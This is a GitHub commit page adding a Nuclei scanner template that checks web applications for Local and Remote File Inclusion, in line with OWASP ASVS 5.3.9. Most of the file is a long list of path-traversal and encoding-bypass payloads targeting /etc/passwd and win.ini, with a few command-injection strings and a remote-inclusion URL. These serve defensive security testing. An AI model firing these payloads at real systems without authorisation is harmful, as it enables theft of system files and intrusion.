Skip to content

Commit

Permalink
Create 5.3.9.yaml
Browse files Browse the repository at this point in the history 
Based on requirement 5.3.9, this template checks whether the application protects against Local File Inclusion (LFI) or Remote File Inclusion (RFI) attacks.

Signed-off-by: AmirHossein Raeisi <[email protected]>
  • Loading branch information
@Ahsraeisi
Ahsraeisi authored Dec 5, 2024
1 parent 88dbe46 commit 7823447
Showing 1 changed file with 143 additions and 0 deletions.
143 changes: 143 additions & 0 deletions templates/dast/5.3.9.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,143 @@
id: ASVS-4-0-3-V5-3-9

info:
name: ASVS 5.3.9 Check
author: AmirHossein Raeisi
severity: high
classification:
cwe-id: CWE-829
reference:
- https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
- https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_9/
- https://github.com/projectdiscovery/nuclei-templates/tree/main/dast/vulnerabilities/lfi
- https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/
- https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion
tags: asvs,5.3.9
description: |
Verify that the application protects against Local File Inclusion (LFI) or Remote File Inclusion (RFI) attacks.
metadata:
max-request: 90

http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'

payloads:
LFI-RFI:
# LFI (Linux)
- '/etc/passwd'
- '../etc/passwd'
- '../../etc/passwd'
- '../../../etc/passwd'
- '/../../../../etc/passwd'
- '../../../../../../../../../etc/passwd'
- '../../../../../../../../etc/passwd'
- '../../../../../../../etc/passwd'
- '../../../../../../etc/passwd'
- '../../../../../etc/passwd'
- '../../../../etc/passwd'
- '../../../etc/passwd'
- '../../../etc/passwd%00'
- '../../../../../../../../../../../../etc/passwd%00'
- '../../../../../../../../../../../../etc/passwd'
- '/../../../../../../../../../../etc/passwd^^'
- '/../../../../../../../../../../etc/passwd'
- '/./././././././././././etc/passwd'
- '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
- '..\..\..\..\..\..\..\..\..\..\etc\passwd'
- '/..\../..\../..\../..\../..\../..\../etc/passwd'
- '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
- '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
- '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
- '%252e%252e%252fetc%252fpasswd'
- '%252e%252e%252fetc%252fpasswd%00'
- '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
- '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
- '....//....//etc/passwd'
- '..///////..////..//////etc/passwd'
- '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
- '%0a/bin/cat%20/etc/passwd'
- '%00/etc/passwd%00'
- '%00../../../../../../etc/passwd'
- '/../../../../../../../../../../../etc/passwd%00.jpg'
- '/../../../../../../../../../../../etc/passwd%00.html'
- '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
- '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '\\&apos;/bin/cat%20/etc/passwd\\&apos;'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
# LFI (Windows)
- '\WINDOWS\win.ini'
- '../../windows/win.ini'
- '....//....//windows/win.ini'
- '../../../../../windows/win.ini'
- '/..///////..////..//////windows/win.ini'
- '/../../../../../../../../../windows/win.ini'
- './../../../../../../../../../../windows/win.ini'
- '..%2f..%2f..%2f..%2fwindows/win.ini'
- '\WINDOWS\win.ini%00'
- '\WINNT\win.ini'
- '\WINNT\win.ini%00'
- 'windows/win.ini%00'
- '/...\...\...\...\...\...\...\...\...\windows\win.ini'
- '/.../.../.../.../.../.../.../.../.../windows/win.ini'
- '/..../..../..../..../..../..../..../..../..../windows/win.ini'
- '/....\....\....\....\....\....\....\....\....\windows\win.ini'
- '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini'
- '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini'
- '/../../../../../../../../../../../../../../../../&location=Windows/win.ini'
- '..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
- '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00'
- '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini'
- '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
- '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini'
- '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
- '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini'
- '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini'
- '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
- '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini'
- '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
- '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
- '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini'
- '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini'
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
- '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini'
- '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini'
# RFI
- "https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/rfi.txt"
fuzzing:
- part: query
type: replace # replaces existing parameter value with fuzz payload
mode: multiple # replaces all parameters value with fuzz payload
fuzz:
- '{{LFI-RFI}}'

stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and

- type: regex
part: body
regex:
- 'root:.*:0:0:'

- type: word
part: body
words:
- "d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a"

0 comments on commit 7823447

Please sign in to comment.